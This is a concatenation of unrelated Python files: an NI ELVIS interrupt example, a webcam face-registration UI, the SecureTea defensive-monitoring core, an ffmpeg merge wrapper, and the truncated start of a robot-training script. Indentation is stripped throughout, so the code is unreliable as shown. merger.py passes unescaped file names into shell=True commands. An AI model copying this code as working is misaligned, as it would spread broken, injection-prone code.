A thread is created to wait for an interrupt. LED0 flashes for 25 seconds
while waiting for an interrupt. An interrupt occurs when DIO0 receives an
appropriate digital signal that meets the interrupt conditions. To trigger
the interrupt, press BTN0 before the timeout expires. The program then
calls the irq_handler function, which makes LED1 flash for 3 seconds.
While LED1 is flashing, LED0 will also keep flashing until the program
ends.
"""
import time
import threading
from nielvis import DIIRQ, LEDs, DIOChannel, IRQNumber, Led
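# --- Illustrative sketch (not part of the original example) ---
# The description above notes that irq_handler can be any callback. As a
# hypothetical alternative to the LED-flashing handler below, a callback can
# simply record when the interrupt fired; this sketch is not wired into the
# DIIRQ session configured later in this file.
interrupt_timestamps = []

def logging_irq_handler():
    # append the current time each time the interrupt fires
    interrupt_timestamps.append(time.time())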
def irq_handler():
"""
irq_handler contains the code you want to execute when the interrupt
occurs. Define your own callback function here by rewriting the code. We
make an LED flash in this example.
"""
# open an LED session
with LEDs() as LED:
# specify the LED which you want to control
led = Led.LED1
# specify the LED status
led_on_off = True
# writes values 10 times, which makes LED1 flash for 3 seconds
for x in range(0, 10):
# turn LED1 on or off
LED.write(led, led_on_off)
# add a short delay
time.sleep(0.3)
# if the LED is on, set the parameter to off
# if the LED is off, set the parameter to on
led_on_off = not led_on_off
# specify the DIO channel that serves as the interrupt channel
irq_channel = DIOChannel.DIO0
# specify the identifier of the interrupt to register
irq_number = IRQNumber.IRQ1
# specify the amount of time, in milliseconds, to wait for an interrupt to
# occur before timing out
timeout = 6000
# specify whether to register an interrupt on the rising edge or the
# falling edge of the digital input signal. To register an interrupt on
# the rising edge of the digital input signal, set interrupt_type_rising
# as True and interrupt_type_falling as False
interrupt_type_rising = True
interrupt_type_falling = False
# specify the number of edges of the signal that must occur for this
# program to register an interrupt. For example, when
# interrupt_type_rising is True and edge_count is 1, an interrupt occurs
# when the DIO channel receives one rising edge
edge_count = 1
# configure a digital input interrupt session
with DIIRQ(irq_channel,
irq_handler,
irq_number,
timeout,
interrupt_type_rising,
interrupt_type_falling,
edge_count) as DI_IRQ:
# open the LED session
LED = LEDs()
# specify the LED which you want to control
led = Led.LED0
# specify the LED status
led_on_off = True
# create a thread to wait for the interrupt
irq_thread = threading.Thread(target=DI_IRQ.wait)
irq_thread.start()
# writes values 50 times, which makes LED0 flash for 25 seconds
for x in range(0, 50):
# turn LED0 on or off
LED.write(led, led_on_off)
# add a short delay
time.sleep(0.5)
# if the LED is on, set the parameter to off
# if the LED is off, set the parameter to on
led_on_off = not led_on_off
# close the LED session
LED.close()
|
face_ui.py
|
from cv2 import circle
from cv2 import rectangle
from numpy import savez_compressed
from PIL import Image, ImageTk
from tkinter import Tk, Button, Label, Entry
import cv2
import face_utils
import numpy as np
import PIL
import threading
import load_dummy_data
def CreateDummyDataSet():
trainX, trainy = load_dummy_data.load_dataset(
'5-celebrity-faces-dataset/train/')
# load test dataset
testX, testy = load_dummy_data.load_dataset(
'5-celebrity-faces-dataset/val/')
savez_compressed('faceset/dummy.npz', trainX, trainy, testX, testy)
def runFaceThread(required_size=(160, 160)):
if(e1.get() == ""):
print("Enter the label to register face")
return
print ("Creating Trainset")
trainX, trainy = face_utils.createTrainSet(cap, e1.get())
# print(" 2 -- > trainx shape",
# str(trainX.shape[0]), "train y shape", str(trainy.shape[0]))
print ("Creating Testset")
testX, testy = face_utils.createTestSet(cap, e1.get())
#CreateDummyDataSet()
# testX = np.concatenate((testX, dummytestX), axis=0)
# testy = np.concatenate((testy, dummytesty), axis=0)
print ("Saving face " + e1.get() + "to faceset/")
savez_compressed('faceset/' + e1.get() + '.npz',
trainX, trainy, testX, testy)
face_utils.create_faceEmbeddings()
#face_utils.train_face()
def registerFace():
#threading.Thread(target=runFaceThread).start()
runFaceThread()
def predictFace():
#cap.set(cv2.CAP_PROP_CONVERT_RGB, 0);
_, frame = cap.read()
frame = cv2.flip(frame, 1)
face_utils.UseMTCNN(frame)
face_utils.predict(frame)
root = Tk()
width, height = 800, 600
cap = cv2.VideoCapture(1)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
btn = Button(root, text="Register face!", command=registerFace)
#btn.grid(row=1, column=0, sticky=W, pady=4)
btn.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
name = Label(root,
text="Enter Name")
name.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
e1 = Entry(root)
#1.grid(row=0, column=1)
e1.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
# predict_btn = Button(root, text="Predict face!", command=predictFace)
# #btn.grid(row=1, column=0, sticky=W, pady=4)
# predict_btn.pack(side="bottom", fill="both", expand="yes", padx=10, pady=10)
root.bind('<Escape>', lambda e: root.quit())
lmain = Label(root)
def show_frame():
_, frame = cap.read()
frame = cv2.flip(frame, 1)
face_utils.UseMTCNN(frame)
face_utils.predict(frame)
#predictFace()
print("Showing face box");
cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
img = PIL.Image.fromarray(cv2image)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, show_frame)
show_frame()
lmain.pack()
root.mainloop()
cap.release()
cv2.destroyAllWindows()
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaWhatsapp
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.lib.social_engineering.socialEngineering import SecureTeaSocialEngineering
from securetea.lib.history_logger.secureTeaHistoryLogger import SecureTeaHistoryLogger
from securetea.lib.history_logger.historylogger_logger import HistoryLogger
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
try:
args_dict = argsHelper.check_args()
except KeyboardInterrupt:
print('\nKeyboard Interrupt detected. \nQuitting....')
exit(0)
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.history_logger = self.cred['history_logger']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.whatsapp_provided = args_dict['whatsapp_provided']
self.social_eng_provided = args_dict['social_eng_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.waf_provided = args_dict["waf_provided"]
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided and not self.cred['skip_config_file']:
credentials.save_creds(self.cred)
elif not self.cred['skip_config_file']:
self.cred = credentials.get_creds(args)
try:
if self.cred['social_eng']:
self.social_eng_provided = True
except KeyError:
self.logger.log(
"Social Engineering configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['whatsapp']:
self.whatsapp_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Whatsapp configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided and not (self.cred['history_logger'] or self.cred['clamav'] or self.cred['yara']):
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid duplicate processes for the objects created by the server mode; set their provided flags to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.waf_provided = False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid duplicate processes for the objects created by the system mode; set their provided flags to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for Social Engineering
if self.social_eng_provided:
self.logger.log(
"Starting SecureTea Social Engineering",
logtype="info"
)
self.social_eng_obj = SecureTeaSocialEngineering(debug=self.cred["debug"], email_id=self.cred["social_eng"]["email"])
self.social_eng_obj.start()
# Check for History Logger
if self.history_logger:
self.logger.log(
"Starting SecureTea History Logger",
logtype="info"
)
self.history_logger_obj = SecureTeaHistoryLogger(debug=self.cred["debug"])
self.history_logger_obj.start()
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid duplicate processes for the objects created by the IoT mode; set their provided flags to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.whatsapp_provided:
self.whatsapp = secureTeaWhatsapp.SecureTeaWhatsapp(
self.cred['whatsapp'],
self.cred['debug']
)
if not self.whatsapp.enabled:
self.logger.log(
"Whatsapp not configured properly.",
logtype="error"
)
else:
self.whatsapp.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.waf_provided:
try:
if self.cred['waf']:
waf_obj = SecureTeaWaf.SecureTeaWaf(cred=self.cred['waf'], debug=self.cred["debug"])
waf_obj.startWaf()
except KeyError:
self.logger.log(
"WAF parameter not configured ",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided or self.cred['clamav'] or self.cred['yara']:
            if self.cred.get('antivirus', 0):
antivirus = self.cred['antivirus']
else:
antivirus = {}
antivirus['update'] = False
antivirus['custom-scan'] = False
antivirus['auto-delete'] = False
antivirus['monitor-usb'] = False
antivirus['monitor-file-changes'] = False
antivirus['virustotal-api-key'] = ''
try:
                antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus,
                                                   use_clamav=self.cred['clamav'], use_yara=self.cred['yara'])
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via whatsapp account
if self.whatsapp_provided:
self.whatsapp.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
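        # Accumulate relative deltas; once the pointer has drifted more than
        # 100 units in any direction, treat it as activity and raise an alert.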
        while True:
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
                while True:
                    # Starting mouse event listener
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
                while True:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
merger.py
|
# -*- coding: utf-8 -*-
import threading, io, os, time
import gui
import CommonVar as cv
import subprocess
import re
import wx
from gui.frame_merger import MergerOutputAppendEvent, MergerOutputUpdateEvent
SHUTDOWN = False
class CustomMethod:
def __init__(self, method, format_set):
self.method = method
self.format_set = format_set
def getCMDLine(self):
return self.method.format(**self.format_set)
class Ffmpeg(threading.Thread):
def __init__(self, dst, src, method):
threading.Thread.__init__(self)
self.dst = dst
self.src = src
self.method = method
self._stdout_buff = []
self._stderr_buff = []
self.stdout = None
self.stderr = None
self.proc = None
def run(self):
method_map = {
cv.MER_VIDEO_AUDIO: self.MergeVideoAudio,
cv.MER_CONCAT_PROTOCAL: self.ConcatProtocal,
cv.MER_CONCAT_DEMUXER: self.ConcatDemuxer
}
method_map[self.method]()
def customMethod(self):
cmdline = self.method.getCMDLine()
self.pipe_open(cmdline)
# def convert_mp4(self):
# cmdline = '"{ffmpeg_path}" -i "{src}" -i "{audio}" -vcodec copy -acodec copy "{output}"'
# cmdline = '"ffmpeg.exe" -i "out.mp4" -c:v libx264 "out1.mp4"'
# self.pipe_open(cmdline)
def handle_output(self, _buff, _thread):
rex_prog = re.compile(
'frame=\s*\s*(.*?)\s*\s*'
'fps=\s*\s*(.*?)\s*\s*'
'q=\s*\s*(.*?)\s*'
'size=\s*(.*?)\s*'
'time=\s*(.*?)\s*'
'bitrate=\s*(.*?)\s*'
'speed=\s*(.*)')
rex_done = re.compile(
'video:\s*\s*(.*?)\s*\s*'
'audio:\s*\s*(.*?)\s*\s*'
'subtitle:\s*\s*(.*?)\s*'
'other streams:\s*(.*?)\s*'
'global headers:\s*(.*?)\s*'
'muxing overhead:\s*(.*)')
total_len = cv.SEL_RES.getVideoTimeLength()
start_time = time.time()
# last_len = 0
next_cur = 0
non_monotonous_counter = 0
while True:
if cv.SHUTDOWN:
break
if len(_buff) > next_cur:
text_line = _buff[next_cur]
if 'Non-monotonous DTS in output stream' in text_line:
non_monotonous_counter += 1
if non_monotonous_counter <= 1:
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(text_line))
else:
if non_monotonous_counter > 1:
                        msg = '*** Skipped (%d) consecutive Non-monotonous messages above; the output video may be incomplete! ***\n' % (non_monotonous_counter - 1)
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(msg))
non_monotonous_counter = 0
wx.PostEvent(gui.frame_merger.textctrl_output, MergerOutputAppendEvent(text_line))
time.sleep(0.01)
res = rex_prog.search(text_line)
if res:
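                    # ffmpeg reports time= as HH:MM:SS.cc; the trailing centiseconds are
                    # captured via the '%y' directive (they land in tm_year) and converted
                    # to milliseconds below.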
tm = time.strptime(res.group(5), '%H:%M:%S.%y')
cur_len = (tm.tm_hour * 60 * 60 + tm.tm_min * 60 + tm.tm_sec) * 1000 + int(str(tm.tm_year)[2:]) * 10
cur_byte_str = res.group(4)
remain = (total_len - cur_len) / (cur_len / (time.time() - start_time))
hour = int(remain / 60 / 60)
minute = int((remain % (60*60)) / 60)
second = int(remain % 60)
remain_time_str = '%02d:%02d:%02d' % (hour, minute, second)
wx.PostEvent(gui.frame_merger.gauge_progress,
MergerOutputUpdateEvent(cur_len=cur_len, total_len=total_len,
cur_byte_str=cur_byte_str, remain_time_str=remain_time_str))
else:
res = rex_done.search(text_line)
if res:
wx.PostEvent(gui.frame_merger.gauge_progress,
MergerOutputUpdateEvent(cur_len=total_len, total_len=total_len, cur_byte_str=str(
round(os.path.getsize(self.dst + cv.TARGET_FORMAT) / 1024)) + 'kb',
remain_time_str='00:00:00'))
next_cur += 1
else:
                if not _thread.is_alive():
break
time.sleep(0.01)
pass
def pipe_open(self, cmdline):
self.proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
stderr=subprocess.PIPE)
self.proc.stdin.close()
self.stdout = io.TextIOWrapper(
self.proc.stdout,
encoding='utf-8'
)
self.stderr = io.TextIOWrapper(
self.proc.stderr,
encoding='utf-8'
)
self._stdout_buff = []
stdout_thr = threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff), daemon=True)
stdout_thr.start()
self._stderr_buff = []
stderr_thr = threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff), daemon=True)
stderr_thr.start()
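        # ffmpeg writes its progress information to stderr, so parse that stream.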
self.handle_output(self._stderr_buff, stderr_thr)
def MergeVideoAudio(self):
cmdline = '"{ffmpeg_path}" -i "{video}" -i "{audio}" -vcodec copy -acodec copy "{output}{ext}"'
cmdline = cmdline.format(video=self.src[0], audio=self.src[1], output=self.dst, ffmpeg_path=cv.FFMPEG_PATH, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def ConcatProtocal(self):
        videos = '|'.join(self.src)
cmdline = '"{ffmpeg_path}" -i concat:"{videos}" -c copy "{output}{ext}"'
cmdline = cmdline.format(videos=videos, output=self.dst, ffmpeg_path=cv.FFMPEG_PATH, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def ConcatDemuxer(self):
concat_files = ["file '%s'" % i for i in self.src]
concat_files_str = '\n'.join(concat_files)
with open('concat_demuxer.txt', 'w') as f:
f.write(concat_files_str)
cmdline = '"{ffmpeg_path}" -f concat -safe 0 -i concat_demuxer.txt -c copy "{output}{ext}"'
cmdline = cmdline.format(ffmpeg_path=cv.FFMPEG_PATH, output=self.dst, ext=cv.TARGET_FORMAT)
self.pipe_open(cmdline)
def getSource(self):
return self.src
def getDest(self):
return self.dst
def _readerthread(self, fh, buffer):
while True:
out = fh.readline()
if out == '':
break
buffer.append(out)
fh.close()
def shutdown(self):
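        # Windows-specific: taskkill terminates the ffmpeg process tree (-t) forcefully (-f).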
cmdline = 'taskkill /pid {pid} -t -f'.format(pid=self.proc.pid)
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True,
stderr=subprocess.PIPE)
a = proc.communicate()
self.proc.kill()
self.proc.terminate()
MER_TASK = []
def make(dst, src, method):
global MER_TASK
task = Ffmpeg(dst, src, method)
MER_TASK.append(task)
return task
def shutdown():
global SHUTDOWN
SHUTDOWN = True
for i in MER_TASK:
i.shutdown()
join()
def isClosed():
global SHUTDOWN
return SHUTDOWN
def del_src_files():
for i in MER_TASK:
for j in i.getSource():
os.remove(os.path.join(cv.FILEPATH, j).lstrip('/').lstrip('\\'))
os.removedirs(os.path.join(cv.FILEPATH, cv.SEL_RES.getVideoLegalTitle()))
def join():
global MER_TASK
if MER_TASK:
for i in MER_TASK:
i.join()
|
SAC_run_v12.py
|
#!/usr/bin/env python3
import threading, queue
import time
import os
import shutil
import numpy as np
import math
import rospy
import tensorflow as tf
from sac_v19 import SAC
from env_v26 import Test
from manipulator_h_base_module_msgs.msg import P2PPose
from CheckCollision_v1 import CheckCollision
MAX_EPISODES = 100000
MAX_EP_STEPS = 600
MEMORY_CAPACITY = 10000
BATCH_SIZE = 512
SIDE = ['right_', 'left_']
SIDE_ = ['R', 'L']
GOAL_REWARD = 800
LOAD = False
SAVE = [False, False]
COUNTER = [1, 1]
TRAIN_CNT = [0, 0]
EP = [0, 0]
WORKS = 1
SUCCESS_ARRAY = np.zeros([2,500])
GOAL_RATE = [40, 40]
ACTION_FLAG = [False, False]
def worker(name, workers, agent):
global SUCCESS_ARRAY, ACTION_FLAG, SAVE, COUNTER, EP
SUCCESS_RATE = 0
COLLISION = False
